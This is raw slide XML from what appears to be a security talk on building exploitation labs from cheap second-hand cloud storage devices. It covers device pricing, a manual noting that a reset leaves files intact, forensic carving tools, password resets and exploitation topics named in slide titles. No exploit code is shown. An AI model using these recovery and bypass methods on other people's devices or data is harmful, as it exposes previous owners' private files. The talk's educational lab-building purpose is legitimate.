              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>ClouDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> Blog</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6" descr="Understanding DNS Tunneling Traffic in the Wild">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{353D5EC4-4BA0-126B-EDA4-A6BFE22B1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49" y="1825625"/>
            <a:ext cx="5438775" cy="23022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2656F7-64DF-68B6-4A21-6FBC1963E49B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6905625" y="4429125"/>
            <a:ext cx="3154646" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Picture Credit: Palo Alto Unit 42</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3757137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DC939-6348-0F4F-F3A1-7389E3FFD476}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET HACKING.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4A7A698-D568-1129-168F-39A10151862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89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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304868" y="1790921"/>
            <a:ext cx="3189205" cy="3903674"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609755" y="229532"/>
            <a:ext cx="10969994" cy="1231106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>HIPSERV / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Pogoplug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> Cloud Hard Drives - One man’s trash is another man’s come up!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4029469" y="1790921"/>
            <a:ext cx="1933551" cy="3869278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6328119" y="1455421"/>
            <a:ext cx="5159031" cy="5649887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="108847" tIns="54423" rIns="108847" bIns="54423" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Western Digital My Book Live / Seagate Go Flex Home, others.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Features:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="261230" indent="-261230">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>2Tb of Online / Cloud Storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="261230" indent="-261230">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Commonly rebranded platform &amp; software </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="261230" indent="-261230">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Storage / Network / Processor / Ram / Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="261230" indent="-261230">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Widely available / recognizable stealth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="261230" indent="-261230">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Portability &amp; Stealth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="DejaVu Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>$5 at the local thrift Store (no Power Supply)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Found power supply at the same thrift store for $2.50</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The loot was… INTERESTING.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"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2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6933652" y="3208771"/>
            <a:ext cx="5851445" cy="3623176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609755" y="26053"/>
            <a:ext cx="10969994" cy="1637628"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5321" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Rule #1: Find out what it’s worth and become a savvy buyer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Picture 30"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9265443" y="1584728"/>
            <a:ext cx="2804929" cy="1702997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B5A2591-F9C9-6893-777F-0C74C0420B7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="394705" y="1881427"/>
            <a:ext cx="6624466" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scouring recyclers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and thrift stores is a *fantastic* way to source equipment, particularly the obscure / oddball / undervalued.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most of these sources are *not* technical, do minimal wiping / security checks, do not understand what they are handling or how to value it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just flipping equipment can be profitable, help you build a lab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We have purchased the critical infrastructure, cryptographic materials and certificates, extremely sensitive data, one of the world’s largest botnets (see us tomorrow), among many other epic finds.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DE14B3B-0C7C-D2A4-D370-8710EBCCF8A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5852114" y="5203529"/>
            <a:ext cx="2163075" cy="154568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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5853300" y="1685926"/>
            <a:ext cx="6117929" cy="4673800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rectangle 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712071" y="498275"/>
            <a:ext cx="10919489" cy="556634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="108847" tIns="54423" rIns="108847" bIns="54423" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2903" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Rule #2: RTFM… read it BEFORE you buy it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2903" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8205CE59-9076-3F33-F044-791A2D95047E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499754" y="1221594"/>
            <a:ext cx="5098274" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read the ******* Manual! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One targeted search and scan can result in critical exposures. You can quickly and easily find serious issues buried in the manual. READ THIS EXCERPT CLOSELY.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even if this was “reset” by the seller, the data hasn’t *really* been wiped. The manual explicitly states this. (page 125)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> *was* “wiped”, open source &amp; freely available forensic and imaging tools are available. You can carve / recover most of their file systems with little effort! (SATA PORT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FTK Imager / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Binwalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / Autopsy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laceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609755" y="1604398"/>
            <a:ext cx="10969994" cy="3975513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:normAutofit fontScale="92500" lnSpcReduction="9999"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="130615">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3870" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>If you have set a password or a static IP address on the My Book Live dashboard and have forgotten it, pressing the reset button while the device is powered up resets the password to the default  value of none and to default IP settings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3870" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>resetting does not erase your files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609755" y="435677"/>
            <a:ext cx="10969994" cy="818814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5321">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Magic PAPERCLIP!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Picture 39"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8293821" y="4407355"/>
            <a:ext cx="3035949" cy="2014968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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15762</TotalTime>
  <Words>3963</Words>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>357</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Liberation Mono;Courier New;DejaVu Sans Mono</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>“The Gang Recycles Their Trash*” Building Elite Skills and Exploitation Labs from equipment found at the Thrift Store!</vt:lpstr>
      <vt:lpstr>Issues with Capabilities Dev and Application</vt:lpstr>
      <vt:lpstr>How do you legally build your skills and tools? Don’t commit crimes, don’t be unethical… ever. Period. End of discussion.  </vt:lpstr>
      <vt:lpstr>Build an Exploitation Lab from equipment found at the Thrift Store?</vt:lpstr>
      <vt:lpstr>What is a Hub?</vt:lpstr>
      <vt:lpstr>HIPSERV / Pogoplug Cloud Hard Drives - One man’s trash is another man’s come up!</vt:lpstr>
      <vt:lpstr>Rule #1: Find out what it’s worth and become a savvy buyer.</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Magic PAPERCLIP!</vt:lpstr>
      <vt:lpstr>Password Protected?</vt:lpstr>
      <vt:lpstr>Noooooooope.</vt:lpstr>
      <vt:lpstr>Exploiting poor user behavior after the horse is glue…</vt:lpstr>
      <vt:lpstr>Rule #3 – “Do not practice that which is of no use.” Vulnerability Scanning and Self-Training</vt:lpstr>
      <vt:lpstr>Scan Policy Configurations</vt:lpstr>
      <vt:lpstr>Scan Policy Configurations</vt:lpstr>
      <vt:lpstr>Scan Policy Credentials</vt:lpstr>
      <vt:lpstr>Scan Policy Plugins</vt:lpstr>
      <vt:lpstr>Scan Target</vt:lpstr>
      <vt:lpstr>Vulnerability Scan Results</vt:lpstr>
      <vt:lpstr>Uh oh…</vt:lpstr>
      <vt:lpstr>Maybe Western Digital can help?</vt:lpstr>
      <vt:lpstr>Rule #4 – Learn to stop worrying and love TECH DEBT: REBRANNDING / REUSE of components.</vt:lpstr>
      <vt:lpstr>WizCase Findings – Exploring Vulnerabilities with known exploits and learning how to refine N-Days</vt:lpstr>
      <vt:lpstr>Building Capabilies and Skills in a Safe Controlled Environment. “How do I exploit…. ?” </vt:lpstr>
      <vt:lpstr>Rule #5 – Always improve your tradecraft.  Understand how mass exploitation occurs and why!</vt:lpstr>
      <vt:lpstr>Cloud Connected Devices &amp; The Downward Spiral.</vt:lpstr>
      <vt:lpstr>How many are *really* out there? </vt:lpstr>
      <vt:lpstr>Review Skills / Ideas so far…</vt:lpstr>
      <vt:lpstr>Hard Drives, Botnets, and how to legally build your own lab</vt:lpstr>
      <vt:lpstr>Living off the Land – Minimal Tools, Maximum Creativity</vt:lpstr>
      <vt:lpstr>Living off the Land</vt:lpstr>
      <vt:lpstr>IoT Botnets – Myth vs Reality</vt:lpstr>
      <vt:lpstr>Solution - Building your Skillset and Lab on a Budget</vt:lpstr>
      <vt:lpstr>Awesome Implants &amp; Stealth</vt:lpstr>
      <vt:lpstr>Sources to Find Them:</vt:lpstr>
      <vt:lpstr>BE VERY CAREFUL FROM HERE ON. </vt:lpstr>
      <vt:lpstr>Go to Github and download these files</vt:lpstr>
      <vt:lpstr>Let’s GO! Installing U-Boot and OpenWRT</vt:lpstr>
      <vt:lpstr>FTDI / Serial Cable</vt:lpstr>
      <vt:lpstr>Use these Pins (Serial) – 115200 8-n-1 </vt:lpstr>
      <vt:lpstr>Install U-Boot</vt:lpstr>
      <vt:lpstr>DO NOT REBOOT THE DEVICE DURING THIS OR RESET*. </vt:lpstr>
